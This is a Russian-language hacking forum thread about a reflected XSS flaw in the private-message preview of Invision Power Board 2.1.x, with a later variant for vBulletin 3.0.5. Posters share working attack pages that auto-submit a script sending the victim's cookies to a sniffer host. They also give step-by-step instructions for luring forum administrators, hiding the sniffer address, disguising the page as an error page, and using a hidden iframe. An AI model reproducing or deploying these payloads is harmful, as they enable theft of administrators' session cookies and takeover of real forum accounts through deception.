Вот нашел сейчас пассивный хсс в ипб 2.1.7(на 2.1.4 тоже работает, на остальных не проверял). При заполнении формы отправки лс, в графу "Заголовок сообщения" пишем: Code: ">[xss_code] напрмер: Code: "><script>alert();</script> Жмём предварительный осмотр и вот наш алерт. Удачно использовать багу можно только через Passive Xss tools (предварительно его подправив), т.к. данные принимаются только чрез POST и стоит ограничение на 40 символов. Passive-Xss-tool by DRON-ANARCHY и Passive xss tool by Dg-X (MySQL)
поясните - какой толк от этой дыры, если она работает только в Предварительном просмотре, при отправки мессаги, код не выполняется, а добавляется в заголовок как обычный текст?
Если я правильно понял, то должно быть что-то типа: HTML: <html> <head> <meta http-equiv="content-type" content="text/html; charset=windows-1251" /> </head> <body onLoad="document.REPLIER.submit();"> <h3>Спасибо, сейчас вы будете перенаправлены</h3> <!-- Сюда можешь вставить любой текст или html код --> <form action="http://---АДРЕС ФОРУМА---/index.php?act=msg" method="post" name="REPLIER""> <input type="hidden" name="removeattachid" value="0" /> <input type="hidden" name="OID" value="" /> <input type="hidden" name="act" value="Msg" /> <input type="hidden" name="CODE" value="04" /> <input type="hidden" name="MODE" value="01" /> <input type="hidden" name="preview" value="Предварительный просмотр"> <input type="hidden" name="msg_title" value='"><script language="JavaScript">aa1 = new Image(); aa1.src="http://---ХОСТ НА КОТОРМ СНИФФЕР---/sniff.php"+document.cookie;</script>'> </form> </body> </html> Эту страницу размещаешь где-нибудь в сети, присылаешь на нее ссылку, когда юзер переходит по ней, он автоматически перенаправляется на целевой форум, потом при учете, что по кукисам он зарегенный пользователь( не зарегистрированным нельзя отправлять сообщения ) он попадает на страницу предварительного просмотра написанного сообщения в своем профиле, на которой выполнится JavaScript код, который отправит его куки твоему снифферу.
Passive XSS у меня так и не заработал, так что попытался тут кое-что свое замутить: Типа скрипт, для юзания данной уязвимости. Инструкция по использованию: 1) Открываем файлик (ipbdeath.htm); 2) Вписываем туда, где указано АДРЕС ФОРУМА-ЖЕРТВЫ; 3) По желанию меняем адрес сниффера. По умолчанию <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 4) Изменяем АДРЕС, КУДА БУДЕТ РЕДИРЕКТИТЬСЯ ПОСЛЕ ОТПРАВКИ КУКИСОВ. 5) Выкладываем этот файлик где-нибудь (не забудьте переименовать, а то "ipbdeath.htm" о многом говорит ) 6) Даем на него ссылку админу форума, лучше всего это делать на самом форуме: в топике или в PM. 7) Все, ждем результата на сниффере. Принцип работы: 1) Пройдя по ссылке, админ попадает на нашу страничку, генерируется нужный POST-запрос. Далее админ автоматически редиректится на страницу отправки PM. 2) Скрипт срабатывает. 3) и страничка сразу редиректится туда, куда вы указали (лучше, думаю, указать на какой-нибудь топик форума, дабы тоже было меньше подозрений). Принцип работы очень прост, постарался просто облегчить использование xss и немного уменьшить палевность. Еще, если форум закэширован, редиректы проскочут быстро, и можно не заметить особо. В общем, жду отзывов, просьба ногами не пинать, я нубик пока IPB Death
Retscan А скрипт то не пашет, сам пробывал исправить, ниче не вышло((( Пришлось делать свое, сделано совсем по другому, что бы усыпить бдительность жертвы, так как не ламер может понять что ему подсунули.Сделал просто напросто фишку под страницу ошибки на narod.ru , чел заходит, а яему ошибку и пишет что сейчас будет перемещен обратно. Но он может все таки просмотреть хтмл код, дык так как я не знаю как закодирывать адресс снифака советую сунуть его в глубь, что б если и просмотрел хтмл код, до него не добрался. Ну и естественно надо файл кидать на народ, и не забудьте его отредактирывать! Файлик
Скачали файлик, ложим его на свой домен на народе акк.народ.ру/файл.хтм и даем админу на форуме, он заходит на сам файл а не на страницу ошибки, сама страница уже вписана в тот файл
_GaLs_ точно не помню.... но смысл такой.... у модера или админа есть функция изменить данные юзера... и там при изменении даты рождения поле не фильтруется
А ещё если я не ошибаюсь ,то можно код выше разместить на ifolder.ru как шапку и на форум выложить ссылку на файл который расположен на ifolder. Ток чёт куки на приходят на лог. Зарегистрировать акк можно здесь Ток надо я думаю надо убрать перенаправление в скрипте.
Лучше впаривать ссылку на страницу такого типа HTML: <html> <body> здесь любой контент <iframe width=0 height=0 frameborder=0 src="frame.htm"> </body> </html> А все "подозрительные" действия совершать во фрейме HTML: <html> <body> <form name="xss" action="http://test1.ru/ipb217/index.php" method="post"> <input type="hidden" name="act" value="Msg"> <input type="hidden" name="CODE" value="04"> <input type="hidden" name="MODE" value="01"> <input type="hidden" name="msg_title" value='"><script>document.location.href="http://test2.ru/xss/s.php?"+document.cookie;</script>'> <script language=javascript>xss.submit()</script> </form> </body> </html> Как на видео с ДЛ
да и еще как узнать версию форума qwerty очень подозрительно то что к примеру чтобы узнать версию 2.1.* надо прописать путь до файла info.php я прописываю в qwerty ну в форуме естесно он мне пишет типа пожалуйста подождите форум загружается и потом главная страница форума,это что означает что файл присутсвует??И как узнать что это точно версия 221???
Попробуй в java-скриптах поглядеть, я обычно там всегда версию находил (но не всегда она там правельная) Вот в Античате я думаю версия не правильная PHP: /*======================================================================*\ || #################################################################### || || # vBulletin 3.0.6 || # ---------------------------------------------------------------- # || || # Copyright ©2000–2005 Jelsoft Enterprises Ltd. All Rights Reserved. || || # This file may not be redistributed in whole or significant part. # || || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || || ############################[DGT-TEAM]############################## || \*======================================================================*/
У меня получилось провернуть это на vbulletin 3.0.5. Спасибо dl и spheere за идею Принцип тот же, вставляем ксс в поле "тема". Дело в том, что на vbull скрипт срабатывал при нажатии кнопки"предварительный просмотр". Поэтому вместо form.submit() следует использовать Code: preview = document.getElementById("pre"); preview.click(); Естественно, предварительно добавив атрибут id кнопке предпросмотра.
